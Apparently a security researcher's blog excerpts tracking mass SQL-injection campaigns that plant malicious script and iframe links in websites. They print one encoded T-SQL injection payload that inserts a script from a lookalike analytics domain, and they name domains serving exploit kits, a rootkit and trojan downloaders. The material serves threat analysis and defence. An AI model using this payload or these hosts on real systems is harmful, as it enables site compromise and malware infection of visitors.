sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13
the domain is currently not resolvable.
sql-injection of iframe links – http://nutcountry.ru:8080/index.php?pid=13
the domain is currently not resolvable.
Notice the 2 ‘i’ in the domain?
The sql-injection attack comes in the form
set+variable=cast(variable+as+varchar(8000))%2Bcast(
char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))
Continue reading
this injected script also has several associated domains
One of the exploit downloads a rootkit from d.cdwsx.com/xx/x150.css [VT Analysis]
active sql-injection attack.
Injected scripts and exploits iframe to several urls such as:
the scripts generate some form of ‘time-based’ parameters that probably is only available for a brief period.
The trojan downloader from http://www.haerh.info get a list of evil programs from http://www.gehae.info/2.txt
another round of sql-injection attacks.
x.js calls iframe src http://www.jejsaj.com/ya/index.html
jejsaj contains various exploits targeting among others
the exploits download trojans from http://www.wowand.com
another round of sql-injection attempt
Update: beware of this malicious script as it is making use of OWC 0-day.
Ref – http://isc.sans.org/diary.html?storyid=6811
a recent round of sql-injected link.
Continue reading
This sql-injected script src has been around for some time.
The interesting point of this script is that it behaves differently if the injected site is from “.gov.cn” or “.edu.cn”. Code as shown below: Continue reading
following previous post, a new injected script has emerged that resolves to same IP.
v.js retrieves another iframe src http://www.vieio.cn/i.htm.
This exploitation kit tries to avoid detection by splitting each respective exploit into 2 files. One .htm and .js
This sql-injected script calls iframe http://www.gomne.cn/yh.htm